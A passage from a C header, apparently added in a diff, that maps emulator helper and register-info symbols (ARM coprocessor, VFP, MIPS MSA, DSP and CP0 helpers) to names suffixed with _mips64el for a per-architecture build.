v6k_cp_reginfo v6k_cp_reginfo_mips64el +#define v7_cp_reginfo v7_cp_reginfo_mips64el +#define v7mp_cp_reginfo v7mp_cp_reginfo_mips64el +#define v7m_pop v7m_pop_mips64el +#define v7m_push v7m_push_mips64el +#define v8_cp_reginfo v8_cp_reginfo_mips64el +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_mips64el +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_mips64el +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_mips64el +#define vapa_cp_reginfo vapa_cp_reginfo_mips64el +#define vbar_write vbar_write_mips64el +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_mips64el +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_mips64el +#define vfp_get_fpcr vfp_get_fpcr_mips64el +#define vfp_get_fpscr vfp_get_fpscr_mips64el +#define vfp_get_fpsr vfp_get_fpsr_mips64el +#define vfp_reg_offset vfp_reg_offset_mips64el +#define vfp_set_fpcr vfp_set_fpcr_mips64el +#define vfp_set_fpscr vfp_set_fpscr_mips64el +#define vfp_set_fpsr vfp_set_fpsr_mips64el +#define visit_end_implicit_struct visit_end_implicit_struct_mips64el +#define visit_end_list visit_end_list_mips64el +#define visit_end_struct visit_end_struct_mips64el +#define visit_end_union visit_end_union_mips64el +#define visit_get_next_type visit_get_next_type_mips64el +#define visit_next_list visit_next_list_mips64el +#define visit_optional visit_optional_mips64el +#define visit_start_implicit_struct visit_start_implicit_struct_mips64el +#define visit_start_list visit_start_list_mips64el +#define visit_start_struct visit_start_struct_mips64el +#define visit_start_union visit_start_union_mips64el +#define vmsa_cp_reginfo vmsa_cp_reginfo_mips64el +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_mips64el +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_mips64el +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_mips64el +#define vmsa_ttbcr_write vmsa_ttbcr_write_mips64el +#define vmsa_ttbr_write vmsa_ttbr_write_mips64el +#define write_cpustate_to_list write_cpustate_to_list_mips64el +#define write_list_to_cpustate write_list_to_cpustate_mips64el +#define write_raw_cp_reg write_raw_cp_reg_mips64el +#define X86CPURegister32_lookup X86CPURegister32_lookup_mips64el +#define x86_op_defs x86_op_defs_mips64el +#define xpsr_read xpsr_read_mips64el +#define xpsr_write xpsr_write_mips64el +#define xscale_cpar_write xscale_cpar_write_mips64el +#define xscale_cp_reginfo xscale_cp_reginfo_mips64el +#define cpu_mips_exec cpu_mips_exec_mips64el +#define cpu_mips_get_random cpu_mips_get_random_mips64el +#define cpu_mips_get_count cpu_mips_get_count_mips64el +#define cpu_mips_store_count cpu_mips_store_count_mips64el +#define cpu_mips_store_compare cpu_mips_store_compare_mips64el +#define cpu_mips_start_count cpu_mips_start_count_mips64el +#define cpu_mips_stop_count cpu_mips_stop_count_mips64el +#define mips_machine_init mips_machine_init_mips64el +#define cpu_mips_kseg0_to_phys cpu_mips_kseg0_to_phys_mips64el +#define cpu_mips_phys_to_kseg0 cpu_mips_phys_to_kseg0_mips64el +#define cpu_mips_kvm_um_phys_to_kseg0 cpu_mips_kvm_um_phys_to_kseg0_mips64el +#define mips_cpu_register_types mips_cpu_register_types_mips64el +#define cpu_mips_init cpu_mips_init_mips64el +#define cpu_state_reset cpu_state_reset_mips64el +#define helper_msa_andi_b helper_msa_andi_b_mips64el +#define helper_msa_ori_b helper_msa_ori_b_mips64el +#define helper_msa_nori_b helper_msa_nori_b_mips64el +#define helper_msa_xori_b helper_msa_xori_b_mips64el +#define helper_msa_bmnzi_b helper_msa_bmnzi_b_mips64el +#define helper_msa_bmzi_b helper_msa_bmzi_b_mips64el +#define helper_msa_bseli_b helper_msa_bseli_b_mips64el +#define helper_msa_shf_df helper_msa_shf_df_mips64el +#define helper_msa_and_v helper_msa_and_v_mips64el +#define helper_msa_or_v helper_msa_or_v_mips64el +#define helper_msa_nor_v helper_msa_nor_v_mips64el +#define helper_msa_xor_v helper_msa_xor_v_mips64el +#define helper_msa_bmnz_v helper_msa_bmnz_v_mips64el +#define helper_msa_bmz_v helper_msa_bmz_v_mips64el +#define helper_msa_bsel_v helper_msa_bsel_v_mips64el +#define helper_msa_addvi_df helper_msa_addvi_df_mips64el +#define helper_msa_subvi_df helper_msa_subvi_df_mips64el +#define helper_msa_ceqi_df helper_msa_ceqi_df_mips64el +#define helper_msa_clei_s_df helper_msa_clei_s_df_mips64el +#define helper_msa_clei_u_df helper_msa_clei_u_df_mips64el +#define helper_msa_clti_s_df helper_msa_clti_s_df_mips64el +#define helper_msa_clti_u_df helper_msa_clti_u_df_mips64el +#define helper_msa_maxi_s_df helper_msa_maxi_s_df_mips64el +#define helper_msa_maxi_u_df helper_msa_maxi_u_df_mips64el +#define helper_msa_mini_s_df helper_msa_mini_s_df_mips64el +#define helper_msa_mini_u_df helper_msa_mini_u_df_mips64el +#define helper_msa_ldi_df helper_msa_ldi_df_mips64el +#define helper_msa_slli_df helper_msa_slli_df_mips64el +#define helper_msa_srai_df helper_msa_srai_df_mips64el +#define helper_msa_srli_df helper_msa_srli_df_mips64el +#define helper_msa_bclri_df helper_msa_bclri_df_mips64el +#define helper_msa_bseti_df helper_msa_bseti_df_mips64el +#define helper_msa_bnegi_df helper_msa_bnegi_df_mips64el +#define helper_msa_sat_s_df helper_msa_sat_s_df_mips64el +#define helper_msa_sat_u_df helper_msa_sat_u_df_mips64el +#define helper_msa_srari_df helper_msa_srari_df_mips64el +#define helper_msa_srlri_df helper_msa_srlri_df_mips64el +#define helper_msa_binsli_df helper_msa_binsli_df_mips64el +#define helper_msa_binsri_df helper_msa_binsri_df_mips64el +#define helper_msa_sll_df helper_msa_sll_df_mips64el +#define helper_msa_sra_df helper_msa_sra_df_mips64el +#define helper_msa_srl_df helper_msa_srl_df_mips64el +#define helper_msa_bclr_df helper_msa_bclr_df_mips64el +#define helper_msa_bset_df helper_msa_bset_df_mips64el +#define helper_msa_bneg_df helper_msa_bneg_df_mips64el +#define helper_msa_addv_df helper_msa_addv_df_mips64el +#define helper_msa_subv_df helper_msa_subv_df_mips64el +#define helper_msa_max_s_df helper_msa_max_s_df_mips64el +#define helper_msa_max_u_df helper_msa_max_u_df_mips64el +#define helper_msa_min_s_df helper_msa_min_s_df_mips64el +#define helper_msa_min_u_df helper_msa_min_u_df_mips64el +#define helper_msa_max_a_df helper_msa_max_a_df_mips64el +#define helper_msa_min_a_df helper_msa_min_a_df_mips64el +#define helper_msa_ceq_df helper_msa_ceq_df_mips64el +#define helper_msa_clt_s_df helper_msa_clt_s_df_mips64el +#define helper_msa_clt_u_df helper_msa_clt_u_df_mips64el +#define helper_msa_cle_s_df helper_msa_cle_s_df_mips64el +#define helper_msa_cle_u_df helper_msa_cle_u_df_mips64el +#define helper_msa_add_a_df helper_msa_add_a_df_mips64el +#define helper_msa_adds_a_df helper_msa_adds_a_df_mips64el +#define helper_msa_adds_s_df helper_msa_adds_s_df_mips64el +#define helper_msa_adds_u_df helper_msa_adds_u_df_mips64el +#define helper_msa_ave_s_df helper_msa_ave_s_df_mips64el +#define helper_msa_ave_u_df helper_msa_ave_u_df_mips64el +#define helper_msa_aver_s_df helper_msa_aver_s_df_mips64el +#define helper_msa_aver_u_df helper_msa_aver_u_df_mips64el +#define helper_msa_subs_s_df helper_msa_subs_s_df_mips64el +#define helper_msa_subs_u_df helper_msa_subs_u_df_mips64el +#define helper_msa_subsus_u_df helper_msa_subsus_u_df_mips64el +#define helper_msa_subsuu_s_df helper_msa_subsuu_s_df_mips64el +#define helper_msa_asub_s_df helper_msa_asub_s_df_mips64el +#define helper_msa_asub_u_df helper_msa_asub_u_df_mips64el +#define helper_msa_mulv_df helper_msa_mulv_df_mips64el +#define helper_msa_div_s_df helper_msa_div_s_df_mips64el +#define helper_msa_div_u_df helper_msa_div_u_df_mips64el +#define helper_msa_mod_s_df helper_msa_mod_s_df_mips64el +#define helper_msa_mod_u_df helper_msa_mod_u_df_mips64el +#define helper_msa_dotp_s_df helper_msa_dotp_s_df_mips64el +#define helper_msa_dotp_u_df helper_msa_dotp_u_df_mips64el +#define helper_msa_srar_df helper_msa_srar_df_mips64el +#define helper_msa_srlr_df helper_msa_srlr_df_mips64el +#define helper_msa_hadd_s_df helper_msa_hadd_s_df_mips64el +#define helper_msa_hadd_u_df helper_msa_hadd_u_df_mips64el +#define helper_msa_hsub_s_df helper_msa_hsub_s_df_mips64el +#define helper_msa_hsub_u_df helper_msa_hsub_u_df_mips64el +#define helper_msa_mul_q_df helper_msa_mul_q_df_mips64el +#define helper_msa_mulr_q_df helper_msa_mulr_q_df_mips64el +#define helper_msa_sld_df helper_msa_sld_df_mips64el +#define helper_msa_maddv_df helper_msa_maddv_df_mips64el +#define helper_msa_msubv_df helper_msa_msubv_df_mips64el +#define helper_msa_dpadd_s_df helper_msa_dpadd_s_df_mips64el +#define helper_msa_dpadd_u_df helper_msa_dpadd_u_df_mips64el +#define helper_msa_dpsub_s_df helper_msa_dpsub_s_df_mips64el +#define helper_msa_dpsub_u_df helper_msa_dpsub_u_df_mips64el +#define helper_msa_binsl_df helper_msa_binsl_df_mips64el +#define helper_msa_binsr_df helper_msa_binsr_df_mips64el +#define helper_msa_madd_q_df helper_msa_madd_q_df_mips64el +#define helper_msa_msub_q_df helper_msa_msub_q_df_mips64el +#define helper_msa_maddr_q_df helper_msa_maddr_q_df_mips64el +#define helper_msa_msubr_q_df helper_msa_msubr_q_df_mips64el +#define helper_msa_splat_df helper_msa_splat_df_mips64el +#define helper_msa_pckev_df helper_msa_pckev_df_mips64el +#define helper_msa_pckod_df helper_msa_pckod_df_mips64el +#define helper_msa_ilvl_df helper_msa_ilvl_df_mips64el +#define helper_msa_ilvr_df helper_msa_ilvr_df_mips64el +#define helper_msa_ilvev_df helper_msa_ilvev_df_mips64el +#define helper_msa_ilvod_df helper_msa_ilvod_df_mips64el +#define helper_msa_vshf_df helper_msa_vshf_df_mips64el +#define helper_msa_sldi_df helper_msa_sldi_df_mips64el +#define helper_msa_splati_df helper_msa_splati_df_mips64el +#define helper_msa_copy_s_df helper_msa_copy_s_df_mips64el +#define helper_msa_copy_u_df helper_msa_copy_u_df_mips64el +#define helper_msa_insert_df helper_msa_insert_df_mips64el +#define helper_msa_insve_df helper_msa_insve_df_mips64el +#define helper_msa_ctcmsa helper_msa_ctcmsa_mips64el +#define helper_msa_cfcmsa helper_msa_cfcmsa_mips64el +#define helper_msa_move_v helper_msa_move_v_mips64el +#define helper_msa_fill_df helper_msa_fill_df_mips64el +#define helper_msa_nlzc_df helper_msa_nlzc_df_mips64el +#define helper_msa_nloc_df helper_msa_nloc_df_mips64el +#define helper_msa_pcnt_df helper_msa_pcnt_df_mips64el +#define helper_msa_fcaf_df helper_msa_fcaf_df_mips64el +#define helper_msa_fcun_df helper_msa_fcun_df_mips64el +#define helper_msa_fceq_df helper_msa_fceq_df_mips64el +#define helper_msa_fcueq_df helper_msa_fcueq_df_mips64el +#define helper_msa_fclt_df helper_msa_fclt_df_mips64el +#define helper_msa_fcult_df helper_msa_fcult_df_mips64el +#define helper_msa_fcle_df helper_msa_fcle_df_mips64el +#define helper_msa_fcule_df helper_msa_fcule_df_mips64el +#define helper_msa_fsaf_df helper_msa_fsaf_df_mips64el +#define helper_msa_fsun_df helper_msa_fsun_df_mips64el +#define helper_msa_fseq_df helper_msa_fseq_df_mips64el +#define helper_msa_fsueq_df helper_msa_fsueq_df_mips64el +#define helper_msa_fslt_df helper_msa_fslt_df_mips64el +#define helper_msa_fsult_df helper_msa_fsult_df_mips64el +#define helper_msa_fsle_df helper_msa_fsle_df_mips64el +#define helper_msa_fsule_df helper_msa_fsule_df_mips64el +#define helper_msa_fcor_df helper_msa_fcor_df_mips64el +#define helper_msa_fcune_df helper_msa_fcune_df_mips64el +#define helper_msa_fcne_df helper_msa_fcne_df_mips64el +#define helper_msa_fsor_df helper_msa_fsor_df_mips64el +#define helper_msa_fsune_df helper_msa_fsune_df_mips64el +#define helper_msa_fsne_df helper_msa_fsne_df_mips64el +#define helper_msa_fadd_df helper_msa_fadd_df_mips64el +#define helper_msa_fsub_df helper_msa_fsub_df_mips64el +#define helper_msa_fmul_df helper_msa_fmul_df_mips64el +#define helper_msa_fdiv_df helper_msa_fdiv_df_mips64el +#define helper_msa_fmadd_df helper_msa_fmadd_df_mips64el +#define helper_msa_fmsub_df helper_msa_fmsub_df_mips64el +#define helper_msa_fexp2_df helper_msa_fexp2_df_mips64el +#define helper_msa_fexdo_df helper_msa_fexdo_df_mips64el +#define helper_msa_ftq_df helper_msa_ftq_df_mips64el +#define helper_msa_fmin_df helper_msa_fmin_df_mips64el +#define helper_msa_fmin_a_df helper_msa_fmin_a_df_mips64el +#define helper_msa_fmax_df helper_msa_fmax_df_mips64el +#define helper_msa_fmax_a_df helper_msa_fmax_a_df_mips64el +#define helper_msa_fclass_df helper_msa_fclass_df_mips64el +#define helper_msa_ftrunc_s_df helper_msa_ftrunc_s_df_mips64el +#define helper_msa_ftrunc_u_df helper_msa_ftrunc_u_df_mips64el +#define helper_msa_fsqrt_df helper_msa_fsqrt_df_mips64el +#define helper_msa_frsqrt_df helper_msa_frsqrt_df_mips64el +#define helper_msa_frcp_df helper_msa_frcp_df_mips64el +#define helper_msa_frint_df helper_msa_frint_df_mips64el +#define helper_msa_flog2_df helper_msa_flog2_df_mips64el +#define helper_msa_fexupl_df helper_msa_fexupl_df_mips64el +#define helper_msa_fexupr_df helper_msa_fexupr_df_mips64el +#define helper_msa_ffql_df helper_msa_ffql_df_mips64el +#define helper_msa_ffqr_df helper_msa_ffqr_df_mips64el +#define helper_msa_ftint_s_df helper_msa_ftint_s_df_mips64el +#define helper_msa_ftint_u_df helper_msa_ftint_u_df_mips64el +#define helper_msa_ffint_s_df helper_msa_ffint_s_df_mips64el +#define helper_msa_ffint_u_df helper_msa_ffint_u_df_mips64el +#define helper_paddsb helper_paddsb_mips64el +#define helper_paddusb helper_paddusb_mips64el +#define helper_paddsh helper_paddsh_mips64el +#define helper_paddush helper_paddush_mips64el +#define helper_paddb helper_paddb_mips64el +#define helper_paddh helper_paddh_mips64el +#define helper_paddw helper_paddw_mips64el +#define helper_psubsb helper_psubsb_mips64el +#define helper_psubusb helper_psubusb_mips64el +#define helper_psubsh helper_psubsh_mips64el +#define helper_psubush helper_psubush_mips64el +#define helper_psubb helper_psubb_mips64el +#define helper_psubh helper_psubh_mips64el +#define helper_psubw helper_psubw_mips64el +#define helper_pshufh helper_pshufh_mips64el +#define helper_packsswh helper_packsswh_mips64el +#define helper_packsshb helper_packsshb_mips64el +#define helper_packushb helper_packushb_mips64el +#define helper_punpcklwd helper_punpcklwd_mips64el +#define helper_punpckhwd helper_punpckhwd_mips64el +#define helper_punpcklhw helper_punpcklhw_mips64el +#define helper_punpckhhw helper_punpckhhw_mips64el +#define helper_punpcklbh helper_punpcklbh_mips64el +#define helper_punpckhbh helper_punpckhbh_mips64el +#define helper_pavgh helper_pavgh_mips64el +#define helper_pavgb helper_pavgb_mips64el +#define helper_pmaxsh helper_pmaxsh_mips64el +#define helper_pminsh helper_pminsh_mips64el +#define helper_pmaxub helper_pmaxub_mips64el +#define helper_pminub helper_pminub_mips64el +#define helper_pcmpeqw helper_pcmpeqw_mips64el +#define helper_pcmpgtw helper_pcmpgtw_mips64el +#define helper_pcmpeqh helper_pcmpeqh_mips64el +#define helper_pcmpgth helper_pcmpgth_mips64el +#define helper_pcmpeqb helper_pcmpeqb_mips64el +#define helper_pcmpgtb helper_pcmpgtb_mips64el +#define helper_psllw helper_psllw_mips64el +#define helper_psrlw helper_psrlw_mips64el +#define helper_psraw helper_psraw_mips64el +#define helper_psllh helper_psllh_mips64el +#define helper_psrlh helper_psrlh_mips64el +#define helper_psrah helper_psrah_mips64el +#define helper_pmullh helper_pmullh_mips64el +#define helper_pmulhh helper_pmulhh_mips64el +#define helper_pmulhuh helper_pmulhuh_mips64el +#define helper_pmaddhw helper_pmaddhw_mips64el +#define helper_pasubub helper_pasubub_mips64el +#define helper_biadd helper_biadd_mips64el +#define helper_pmovmskb helper_pmovmskb_mips64el +#define helper_absq_s_ph helper_absq_s_ph_mips64el +#define helper_absq_s_qb helper_absq_s_qb_mips64el +#define helper_absq_s_w helper_absq_s_w_mips64el +#define helper_addqh_ph helper_addqh_ph_mips64el +#define helper_addqh_r_ph helper_addqh_r_ph_mips64el +#define helper_addqh_r_w helper_addqh_r_w_mips64el +#define helper_addqh_w helper_addqh_w_mips64el +#define helper_adduh_qb helper_adduh_qb_mips64el +#define helper_adduh_r_qb helper_adduh_r_qb_mips64el +#define helper_subqh_ph helper_subqh_ph_mips64el +#define helper_subqh_r_ph helper_subqh_r_ph_mips64el +#define helper_subqh_r_w helper_subqh_r_w_mips64el +#define helper_subqh_w helper_subqh_w_mips64el +#define helper_addq_ph helper_addq_ph_mips64el +#define helper_addq_s_ph helper_addq_s_ph_mips64el +#define helper_addq_s_w helper_addq_s_w_mips64el +#define helper_addu_ph helper_addu_ph_mips64el +#define helper_addu_qb helper_addu_qb_mips64el +#define helper_addu_s_ph helper_addu_s_ph_mips64el +#define helper_addu_s_qb helper_addu_s_qb_mips64el +#define helper_subq_ph helper_subq_ph_mips64el +#define helper_subq_s_ph helper_subq_s_ph_mips64el +#define helper_subq_s_w helper_subq_s_w_mips64el +#define helper_subu_ph helper_subu_ph_mips64el +#define helper_subu_qb helper_subu_qb_mips64el +#define helper_subu_s_ph helper_subu_s_ph_mips64el +#define helper_subu_s_qb helper_subu_s_qb_mips64el +#define helper_subuh_qb helper_subuh_qb_mips64el +#define helper_subuh_r_qb helper_subuh_r_qb_mips64el +#define helper_addsc helper_addsc_mips64el +#define helper_addwc helper_addwc_mips64el +#define helper_modsub helper_modsub_mips64el +#define helper_raddu_w_qb helper_raddu_w_qb_mips64el +#define helper_precr_qb_ph helper_precr_qb_ph_mips64el +#define helper_precrq_qb_ph helper_precrq_qb_ph_mips64el +#define helper_precr_sra_ph_w helper_precr_sra_ph_w_mips64el +#define helper_precr_sra_r_ph_w helper_precr_sra_r_ph_w_mips64el +#define helper_precrq_ph_w helper_precrq_ph_w_mips64el +#define helper_precrq_rs_ph_w helper_precrq_rs_ph_w_mips64el +#define helper_precrqu_s_qb_ph helper_precrqu_s_qb_ph_mips64el +#define helper_precequ_ph_qbl helper_precequ_ph_qbl_mips64el +#define helper_precequ_ph_qbr helper_precequ_ph_qbr_mips64el +#define helper_precequ_ph_qbla helper_precequ_ph_qbla_mips64el +#define helper_precequ_ph_qbra helper_precequ_ph_qbra_mips64el +#define helper_preceu_ph_qbl helper_preceu_ph_qbl_mips64el +#define helper_preceu_ph_qbr helper_preceu_ph_qbr_mips64el +#define helper_preceu_ph_qbla helper_preceu_ph_qbla_mips64el +#define helper_preceu_ph_qbra helper_preceu_ph_qbra_mips64el +#define helper_shll_qb helper_shll_qb_mips64el +#define helper_shrl_qb helper_shrl_qb_mips64el +#define helper_shra_qb helper_shra_qb_mips64el +#define helper_shra_r_qb helper_shra_r_qb_mips64el +#define helper_shll_ph helper_shll_ph_mips64el +#define helper_shll_s_ph helper_shll_s_ph_mips64el +#define helper_shll_s_w helper_shll_s_w_mips64el +#define helper_shra_r_w helper_shra_r_w_mips64el +#define helper_shrl_ph helper_shrl_ph_mips64el +#define helper_shra_ph helper_shra_ph_mips64el +#define helper_shra_r_ph helper_shra_r_ph_mips64el +#define helper_muleu_s_ph_qbl helper_muleu_s_ph_qbl_mips64el +#define helper_muleu_s_ph_qbr helper_muleu_s_ph_qbr_mips64el +#define helper_mulq_rs_ph helper_mulq_rs_ph_mips64el +#define helper_mul_ph helper_mul_ph_mips64el +#define helper_mul_s_ph helper_mul_s_ph_mips64el +#define helper_mulq_s_ph helper_mulq_s_ph_mips64el +#define helper_muleq_s_w_phl helper_muleq_s_w_phl_mips64el +#define helper_muleq_s_w_phr helper_muleq_s_w_phr_mips64el +#define helper_mulsaq_s_w_ph helper_mulsaq_s_w_ph_mips64el +#define helper_mulsa_w_ph helper_mulsa_w_ph_mips64el +#define helper_dpau_h_qbl helper_dpau_h_qbl_mips64el +#define helper_dpau_h_qbr helper_dpau_h_qbr_mips64el +#define helper_dpsu_h_qbl helper_dpsu_h_qbl_mips64el +#define helper_dpsu_h_qbr helper_dpsu_h_qbr_mips64el +#define helper_dpa_w_ph helper_dpa_w_ph_mips64el +#define helper_dpax_w_ph helper_dpax_w_ph_mips64el +#define helper_dps_w_ph helper_dps_w_ph_mips64el +#define helper_dpsx_w_ph helper_dpsx_w_ph_mips64el +#define helper_dpaq_s_w_ph helper_dpaq_s_w_ph_mips64el +#define helper_dpaqx_s_w_ph helper_dpaqx_s_w_ph_mips64el +#define helper_dpsq_s_w_ph helper_dpsq_s_w_ph_mips64el +#define helper_dpsqx_s_w_ph helper_dpsqx_s_w_ph_mips64el +#define helper_dpaqx_sa_w_ph helper_dpaqx_sa_w_ph_mips64el +#define helper_dpsqx_sa_w_ph helper_dpsqx_sa_w_ph_mips64el +#define helper_dpaq_sa_l_w helper_dpaq_sa_l_w_mips64el +#define helper_dpsq_sa_l_w helper_dpsq_sa_l_w_mips64el +#define helper_maq_s_w_phl helper_maq_s_w_phl_mips64el +#define helper_maq_s_w_phr helper_maq_s_w_phr_mips64el +#define helper_maq_sa_w_phl helper_maq_sa_w_phl_mips64el +#define helper_maq_sa_w_phr helper_maq_sa_w_phr_mips64el +#define helper_mulq_s_w helper_mulq_s_w_mips64el +#define helper_mulq_rs_w helper_mulq_rs_w_mips64el +#define helper_bitrev helper_bitrev_mips64el +#define helper_insv helper_insv_mips64el +#define helper_cmpgu_eq_qb helper_cmpgu_eq_qb_mips64el +#define helper_cmpgu_lt_qb helper_cmpgu_lt_qb_mips64el +#define helper_cmpgu_le_qb helper_cmpgu_le_qb_mips64el +#define helper_cmpu_eq_qb helper_cmpu_eq_qb_mips64el +#define helper_cmpu_lt_qb helper_cmpu_lt_qb_mips64el +#define helper_cmpu_le_qb helper_cmpu_le_qb_mips64el +#define helper_cmp_eq_ph helper_cmp_eq_ph_mips64el +#define helper_cmp_lt_ph helper_cmp_lt_ph_mips64el +#define helper_cmp_le_ph helper_cmp_le_ph_mips64el +#define helper_pick_qb helper_pick_qb_mips64el +#define helper_pick_ph helper_pick_ph_mips64el +#define helper_packrl_ph helper_packrl_ph_mips64el +#define helper_extr_w helper_extr_w_mips64el +#define helper_extr_r_w helper_extr_r_w_mips64el +#define helper_extr_rs_w helper_extr_rs_w_mips64el +#define helper_extr_s_h helper_extr_s_h_mips64el +#define helper_extp helper_extp_mips64el +#define helper_extpdp helper_extpdp_mips64el +#define helper_shilo helper_shilo_mips64el +#define helper_mthlip helper_mthlip_mips64el +#define cpu_wrdsp cpu_wrdsp_mips64el +#define helper_wrdsp helper_wrdsp_mips64el +#define cpu_rddsp cpu_rddsp_mips64el +#define helper_rddsp helper_rddsp_mips64el +#define helper_raise_exception_err helper_raise_exception_err_mips64el +#define helper_clo helper_clo_mips64el +#define helper_clz helper_clz_mips64el +#define helper_muls helper_muls_mips64el +#define helper_mulsu helper_mulsu_mips64el +#define helper_macc helper_macc_mips64el +#define helper_macchi helper_macchi_mips64el +#define helper_maccu helper_maccu_mips64el +#define helper_macchiu helper_macchiu_mips64el +#define helper_msac helper_msac_mips64el +#define helper_msachi helper_msachi_mips64el +#define helper_msacu helper_msacu_mips64el +#define helper_msachiu helper_msachiu_mips64el +#define helper_mulhi helper_mulhi_mips64el +#define helper_mulhiu helper_mulhiu_mips64el +#define helper_mulshi helper_mulshi_mips64el +#define helper_mulshiu helper_mulshiu_mips64el +#define helper_bitswap helper_bitswap_mips64el +#define helper_ll helper_ll_mips64el +#define helper_sc helper_sc_mips64el +#define helper_swl helper_swl_mips64el +#define helper_swr helper_swr_mips64el +#define helper_lwm helper_lwm_mips64el +#define helper_swm helper_swm_mips64el +#define helper_mfc0_mvpcontrol helper_mfc0_mvpcontrol_mips64el +#define helper_mfc0_mvpconf0 helper_mfc0_mvpconf0_mips64el +#define helper_mfc0_mvpconf1 helper_mfc0_mvpconf1_mips64el +#define helper_mfc0_random helper_mfc0_random_mips64el +#define helper_mfc0_tcstatus helper_mfc0_tcstatus_mips64el +#define helper_mftc0_tcstatus helper_mftc0_tcstatus_mips64el +#define helper_mfc0_tcbind helper_mfc0_tcbind_mips64el +#define helper_mftc0_tcbind helper_mftc0_tcbind_mips64el +#define helper_mfc0_tcrestart helper_mfc0_tcrestart_mips64el +#define helper_mftc0_tcrestart helper_mftc0_tcrestart_mips64el +#define helper_mfc0_tchalt helper_mfc0_tchalt_mips64el +#define helper_mftc0_tchalt helper_mftc0_tchalt_mips64el +#define helper_mfc0_tccontext helper_mfc0_tccontext_mips64el +#define helper_mftc0_tccontext helper_mftc0_tccontext_mips64el +#define helper_mfc0_tcschedule helper_mfc0_tcschedule_mips64el +#define helper_mftc0_tcschedule helper_mftc0_tcschedule_mips64el +#define helper_mfc0_tcschefback helper_mfc0_tcschefback_mips64el +#define helper_mftc0_tcschefback helper_mftc0_tcschefback_mips64el +#define helper_mfc0_count helper_mfc0_count_mips64el +#define helper_mftc0_entryhi helper_mftc0_entryhi_mips64el +#define helper_mftc0_cause helper_mftc0_cause_mips64el +#define helper_mftc0_status helper_mftc0_status_mips64el +#define helper_mfc0_lladdr helper_mfc0_lladdr_mips64el +#define helper_mfc0_watchlo helper_mfc0_watchlo_mips64el +#define helper_mfc0_watchhi helper_mfc0_watchhi_mips64el +#define helper_mfc0_debug helper_mfc0_debug_mips64el +#define helper_mftc0_debug helper_mftc0_debug_mips64el +#define helper_mtc0_index helper_mtc0_index_mips64el +#define helper_mtc0_mvpcontrol helper_mtc0_mvpcontrol_mips64el +#define helper_mtc0_vpecontrol helper_mtc0_vpecontrol_mips64el +#define helper_mttc0_vpecontrol helper_mttc0_vpecontrol_mips64el +#define helper_mftc0_vpecontrol helper_mftc0_vpecontrol_mips64el +#define helper_mftc0_vpeconf0 helper_mftc0_vpeconf0_mips64el +#define helper_mtc0_vpeconf0 helper_mtc0_vpeconf0_mips64el +#define helper_mttc0_vpeconf0 helper_mttc0_vpeconf0_mips64el +#define helper_mtc0_vpeconf1 helper_mtc0_vpeconf1_mips64el +#define helper_mtc0_yqmask helper_mtc0_yqmask_mips64el +#define helper_mtc0_vpeopt helper_mtc0_vpeopt_mips64el +#define helper_mtc0_entrylo0 helper_mtc0_entrylo0_mips64el +#define helper_mtc0_tcstatus helper_mtc0_tcstatus_mips64el +#define helper_mttc0_tcstatus helper_mttc0_tcstatus_mips64el +#define helper_mtc0_tcbind helper_mtc0_tcbind_mips64el +#define helper_mttc0_tcbind helper_mttc0_tcbind_mips64el +#define helper_mtc0_tcrestart helper_mtc0_tcrestart_mips64el +#define helper_mttc0_tcrestart helper_mttc0_tcrestart_mips64el +#define helper_mtc0_tchalt helper_mtc0_tchalt_mips64el +#define helper_mttc0_tchalt helper_mttc0_tchalt_mips64el +#define helper_mtc0_tccontext helper_mtc0_tccontext_mips64el +#define helper_mttc0_tccontext helper_mttc0_tccontext_mips64el +#define helper_mtc0_tcschedule helper_mtc0_tcschedule_mips64el +#define helper_mttc0_tcschedule helper_mttc0_tcschedule_mips64el +#define helper_mtc0_tcschefback helper_mtc0_tcschefback_mips64el +#define helper_mttc0_tcschefback helper_mttc0_tcschefback_mips64el +#define helper_mtc0_entrylo1 helper_mtc0_entrylo1_mips64el +#define helper_mtc0_context helper_mtc0_context_mips64el +#define helper_mtc0_pagemask helper_mtc0_pagemask_mips64el +#define helper_mtc0_pagegrain helper_mtc0_pagegrain_mips64el +#define helper_mtc0_wired helper_mtc0_wired_mips64el +#define helper_mtc0_srsconf0 helper_mtc0_srsconf0_mips64el +#define helper_mtc0_srsconf1 helper_mtc0_srsconf1_mips64el +#define helper_mtc0_srsconf2 helper_mtc0_srsconf2_mips64el +#define helper_mtc0_srsconf3 helper_mtc0_srsconf3_mips64el +#define helper_mtc0_srsconf4 helper_mtc0_srsconf4_mips64el +#define helper_mtc0_hwrena helper_mtc0_hwrena_mips64el +#define helper_mtc0_count helper_mtc0_count_mips64el +#define helper_mtc0_entryhi helper_mtc0_entryhi_mips64el +#define helper_mttc0_entryhi helper_mttc0_entryhi_mips64el +#define helper_mtc0_compare helper_mtc0_compare_mips64el +#define helper_mtc0_status helper_mtc0_status_mips64el +#define helper_mttc0_status helper_mttc0_status_mips64el +#define helper_mtc0_intctl helper_mtc0_intctl_mips64el +#define helper_mtc0_srsctl helper_mtc0_srsctl_mips64el +#define helper_mtc0_cause helper_mtc0_cause_mips64el +#define helper_mttc0_cause helper_mttc0_cause_mips64el +#define helper_mftc0_epc helper_mftc0_epc_mips64el +#define helper_mftc0_ebase helper_mftc0_ebase_mips64el +#define helper_mtc0_ebase helper_mtc0_ebase_mips64el +#define helper_mttc0_ebase helper_mttc0_ebase_mips64el +#define helper_mftc0_configx helper_mftc0_configx_mips64el +#define helper_mtc0_config0 helper_mtc0_config0_mips64el +#define helper_mtc0_config2 helper_mtc0_config2_mips64el +#define helper_mtc0_config4 helper_mtc0_config4_mips64el +#define helper_mtc0_config5 helper_mtc0_config5_mips64el +#define helper_mtc0_lladdr helper_mtc0_lladdr_mips64el +#define helper_mtc0_watchlo helper_mtc0_watchlo_mips64el +#define helper_mtc0_watchhi helper_mtc0_watchhi_mips64el +#define helper_mtc0_xcontext helper_mtc0_xcontext_mips64el +#define helper_mtc0_framemask helper_mtc0_framemask_mips64el +#define helper_mtc0_debug helper_mtc0_debug_mips64el +#define helper_mttc0_debug helper_mttc0_debug_mips64el +#define helper_mtc0_performance0 helper_mtc0_performance0_mips64el +#define helper_mtc0_taglo helper_mtc0_taglo_mips64el +#define 